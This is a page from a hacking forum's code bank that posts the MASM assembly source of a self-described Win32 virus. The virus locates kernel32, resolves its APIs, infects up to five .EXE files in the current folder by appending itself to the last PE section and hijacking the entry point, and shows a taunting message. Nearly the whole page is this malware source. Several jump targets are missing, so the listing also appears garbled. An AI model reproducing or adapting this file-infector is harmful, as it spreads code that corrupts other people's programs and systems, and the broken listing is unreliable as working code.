Welcome to HBH! If you have tried to register and didn't get a verification email, please using the following link to resend the verification email.

Win32 Virus - Assembly Code Bank

Win32 Virus
My little win32 virus, that infects .exe files in directory Compiler--MASM
.model flat,stdcall
option casemap:none
include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
includelib \masm32\lib\kernel32.lib
include \masm32\include\user32.inc
includelib \masm32\lib\user32.lib

VirusSize      equ   (offset VirusEnd - offset VirusStart)
OurTitle	 db "Message",0
OurMessage   db "This Is [Win32] Virus",10
			 db	"           by EdoVt",0

VirusStart    label byte
	call delta
	pop ebp
	sub ebp,offset delta;; ebp=delta offset
	mov eax,[esp+24h];;eax==somewhere in Kernel32( CreateProcess) 
	call FuckTheK32
	call GetAPIz
	call Infect
    or ebp,ebp
	jz @1stGen;;;;;;First Generetion
	;;WE Can Fuck This File
	;;;Call Of LoadLibrary API
	lea eax,[USER32DLL+ebp]
	push eax
	call [ebp+_LoadLibraryA]
	;;;End Call eax==user32.dll	handle
	;;;Call of GetProcAddress
	lea ecx,[MESSAGEBOX+ebp]
	push ecx
	push eax
	call [ebp+_GetProcAddress]
	;;;;End Call  Eax==MessageBoxA Address
	;;;MessageBoxA  Call
	xor ebx,ebx
    push ebx
	lea ecx,[MesTitle+ebp]
	push ecx
	lea ecx,[Mess+ebp]
	push ecx
	push ebx
	call eax
	mov eax,12345678h
	org $-4
ImageBase			dd 400000h
	add eax,12345678h
	org $-4
EntryPoint			dd 1000h
	jmp eax
	;;return to the host
	push 0
	call ExitProcess

	and [ebp+Infections],00000000h
	lea eax,[@WinFindData+ebp]
	push eax
	lea eax,[SearchMask+ebp]
	push  eax
	call [ebp+_FindFirstFileA]
	inc eax
	or eax,eax
	jz FailInfect
	dec eax
	mov [ebp+SearchHandle],eax
	push [ebp+EntryPoint]
	push [ebp+ImageBase]
	call Infection
	pop [ebp+ImageBase]
	pop [ebp+EntryPoint]
	inc [ebp+Infections]
	cmp [ebp+Infections],5
	jz CloseSearchHandle
	;;;;;;;;Its All Right
	lea edi,[@WinFindData.cFileName+ebp]
	mov ecx,MAX_PATH
	xor al,al
rep stosb
	lea eax,[ebp+@WinFindData]
	push eax
	push dword ptr [ebp+SearchHandle]
	call [ebp+_FindNextFileA]
	or eax,eax
	jnz InfectIt
	push [ebp+SearchHandle]
	call [ebp+_FindClose]
	lea esi,dword ptr[ebp+@WinFindData.cFileName]
	push 80h
	push esi
	call [ebp+_SetFileAttributesA]
    call @OpenFile
	inc eax
	or eax,eax
	jz CantOpen
	dec eax;;eax==Current File handle
	mov [ebp+FileHandle],eax
	xor ecx,ecx
	call CreateMap
	or eax,eax
	jz CloseFile
	mov [ebp+MapHandle],eax
	mov ecx,[ebp+@WinFindData.nFileSizeLow]
	call MapFile
	or eax,eax
	jz CloseMap
	mov [ebp+MapAddress],eax
	mov esi,[eax+3ch]
	add esi,eax;;;;;PE header in esi
	mov eax,esi
	cmp word ptr[eax],'EP'
	jnz NoInfect
	;;;Yeah its PE file
	cmp dword ptr [eax-04h],'nooM';;;Is File Infected
	jz NoInfect
	push dword ptr [eax+3ch]
	push dword ptr [ebp+MapAddress]
	call [ebp+_UnmapViewOfFile]
	push    dword ptr [ebp+MapHandle]
    call    [ebp+_CloseHandle]
	pop ecx;;;File  ALign
	mov eax,[ebp+@WinFindData.nFileSizeLow]
	add eax,VirusSize
	call @@Align
	mov [ebp+NewSize],eax
	xchg ecx,eax
	call CreateMap
	or eax,eax
	jz CloseFile
	mov [ebp+MapHandle],eax
	mov ecx,[ebp+NewSize]
	call MapFile
	or eax,eax
	jz CloseMap
	mov [ebp+MapAddress],eax
	mov esi,[eax+3ch]
	add esi,eax;;;;;PE header in esi
	mov edi,esi
	add esi,78h;;Pointer to Directory table
	mov edx,[edi+74h];;Number of directories
	shl edx,3
	add esi,edx;;Pointer to 1st section
	movzx eax,word ptr [edi+06h]
	dec eax
	imul eax,eax,28h
	add esi,eax;;;;esi =====pointer to last the section
	mov eax,dword ptr[edi+28h];;;EntryPoint in eax
	mov dword ptr[ebp+EntryPoint],eax
	mov eax,dword ptr[edi+34h]
	mov dword ptr[ebp+ImageBase],eax
	mov edx,dword ptr[esi+10h];;Sizeofrawdata
	mov ebx,edx
	add edx,dword ptr[esi+14h];;edx=edx+Pointer to raw data
	push edx
	mov eax,dword ptr[esi+0ch];;eax===last section RVA
	add eax,ebx;;;;NewEIP
	mov dword ptr [ebp+OurEntryPoint],eax;;;New ENtryPoint
	mov dword ptr[edi+28h],eax;;Set New EntryPoint
	mov eax,dword ptr[esi+10h];;Size of raw data
	add eax,VirusSize
	push eax
	mov ecx,[edi+3ch]
	call @@Align
	mov dword ptr[esi+10h],eax;;;New Size of raw data
	mov ecx,[edi+038h]
	pop eax
	call @@Align
	shl eax,1
	mov dword ptr[esi+08h],eax;;New Virtual Size
	pop edx;;;;edx=SizeOfRawData+Pointer to raw data
    add     eax,dword ptr[esi+0Ch];;eax=eax+RVA(Last Section)               
    mov     dword ptr[edi+50h],eax;;;New SizeOfImage
	or dword ptr [esi+24h],0A0000020h;;;New attributes for last section
	mov dword ptr [edi-04h],"nooM";;Our LOGO
	lea esi,[ebp+start]
	mov edi,edx
	add edi,[ebp+MapAddress];;;edi=Pointer to place where go our virus
	mov ecx,VirusSize
rep	movsb
	push dword ptr [ebp+MapAddress]
	call [ebp+_UnmapViewOfFile]
	jmp CloseMap
	dec word ptr [ebp+Infections]
	push dword ptr [ebp+MapHandle]
	call [ebp+_CloseHandle]
	push dword ptr [ebp+FileHandle]
	call [ebp+_CloseHandle]
	push    dword ptr [ebp+@WinFindData.dwFileAttributes]
    lea     eax,[ebp+@WinFindData.cFileName]       
    push    eax
    call    [ebp+_SetFileAttributesA]

@@Align  proc
	xor edx,edx
	push eax
	div ecx
	pop eax
	or edx,edx
	jz Enough
	sub ecx,edx
	add eax,ecx
Enough:	ret
@@Align endp
MapFile    proc
	xor eax,eax
	push ecx
	push eax
	push eax
	push 02h
	push [ebp+MapHandle]
	call [ebp+_MapViewOfFile]
MapFile endp
CreateMap  proc
	xor eax,eax
	push eax
	push ecx
	push eax
	push 04h
	push eax
	push [ebp+FileHandle]
	call [ebp+_CreateFileMappingA]
CreateMap endp
@OpenFile    proc;;esi=pointer to the file name
	xor eax,eax
	push eax
	push eax
	push 03h
	push eax
	push 01h
	push 80000000h or 40000000h
	push esi
	call [ebp+_CreateFileA]
@OpenFile  endp

FuckTheK32	proc;;eax==somewhere in Kernel32( CreateProcess) 
	cmp word ptr [eax],"ZM";;Is It MZ header
	jz WeGotK32MZ
	dec eax;
	jmp @loop;;loop
	mov [Kernel_MZ+ebp],eax
	add eax,3ch;;[eax] === PE header offset
	mov eax,[eax];;eax===PE header offset
	add eax,[ebp+Kernel_MZ];;;Normalize
	cmp word ptr [eax],"EP"
	jz WeGotK32

	;;;Call of ExitProcess
	push 0
	call ExitProcess
	mov [Kernel_PE+ebp],eax
	mov esi,eax;;esi=Kernel_PE
	add esi,78h
	lodsd;;;; eax=RVA of Export Table
	add eax,[Kernel_MZ+ebp];;;Normalize
	mov esi,eax
	add esi,1ch
	lodsd;;;eax==RVA of Export Address   table 
	add eax,[Kernel_MZ+ebp];;Normalize that
	mov [ExpAddrTableVA+ebp],eax;;Keeping
	lodsd;;eax==RVA of Export Names pointer table
	add eax,[Kernel_MZ+ebp];;Normalizing
	mov [ExpNameTableVA+ebp],eax
	add eax,[Kernel_MZ+ebp]
	mov [ExpOrdinalTableVA+ebp],eax

FuckTheK32 endp
;;;;;;;;;;;;;;;;;Function to Get the APIs Addressis	
GetAPIz		proc
	lea ebx,[OurAPIz+ebp]
	lea edi,[OurFuncz+ebp]
	push edi
	mov [Counter+ebp],0
	xor ecx,ecx
	mov esi,ebx
@_1: lodsb
	inc ecx
	or al,al
	jnz @_1
	mov edx,ecx
	mov edi,ebx
	mov esi,[ExpNameTableVA+ebp]
	push esi
	mov esi,eax
	add esi,[Kernel_MZ+ebp]
    repe cmpsb
	jz TheyAreEqual
	pop esi
	add esi,4
	push esi
	mov edi,ebx
	mov ecx,edx
	inc word ptr [Counter+ebp]
	jmp @_2
	pop esi
	pop edi
	xor esi,esi
	add ebx,edx
	xor eax,eax
	mov si,[Counter+ebp]
	shl esi,1
	add esi,[ExpOrdinalTableVA+ebp]
	mov esi,eax
	shl esi,2
	add esi,[ExpAddrTableVA+ebp]
	add eax,[Kernel_MZ+ebp]
	cmp dword ptr [ebx],"jreV"
	jnz begin
GetAPIz endp
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Functions End
Infections			db 0
OurEntryPoint		dd 1000h
Counter				dw 0
USER32DLL			db "user32.dll",0
MESSAGEBOX			db "MessageBoxA",0
MesTitle			db "Got Ya !!!!!!!!!!!!!",0
Mess				db "Everything under the sun is in tune,",10
					db	"But the sun is eclipsed by the MOON.",10
					db	"                               Pink Floyd",10,10
					db	"This File Is Infected By ",0
SearchMask			db '*.EXE',0

OurAPIz		label byte
@FindFirstFileA		db "FindFirstFileA",0
@FindNextFileA		db "FindNextFileA",0
@FindClose			db "FindClose",0
@CloseHandle		db "CloseHandle",0
@CreateFileA		db "CreateFileA",0
@SetFilePointer		db "SetFilePointer",0
@SetFileAttributesA db "SetFileAttributesA",0
@CreateFileMappingA db "CreateFileMappingA",0
@MapViewOfFile		db "MapViewOfFile",0
@UnmapViewOfFile	db "UnmapViewOfFile",0
@SetEndOfFile		db "SetEndOfFile",0
@LoadLibraryA		db "LoadLibraryA",0
@GetProcAddress		db "GetProcAddress",0
					db "Verj",0
VirusEnd    label byte
OurFuncz	label byte
_FindFirstFileA		dd 0
_FindNextFileA		dd 0
_FindClose			dd 0
_CloseHandle		dd 0
_CreateFileA		dd 0
_SetFilePointer     dd 0
_SetFileAttributesA dd 0
_CreateFileMappingA dd 0
_MapViewOfFile		dd 0
_UnmapViewOfFile    dd 0
_SetEndOfFile		dd 0
_LoadLibraryA		dd 0
_GetProcAddress     dd 0
@WinFindData		WIN32_FIND_DATA  <>
SearchHandle		dd ?
FileHandle			dd ?
MapHandle			dd ?
MapAddress			dd ?
NewSize				dd ?
OurDelta			dd ?
HostStart           dd ?
Kernel_MZ	 		dd ?
Kernel_PE	 		dd ?
ExpAddrTableVA 		dd ?
ExpNameTableVA 		dd ?
ExpOrdinalTableVA	dd ?

	xor eax,eax
	push eax
	push offset OurTitle
	push offset OurMessage
	push eax
	call MessageBoxA
	push 0
	call ExitProcess
end start

Sorry but there are no comments to display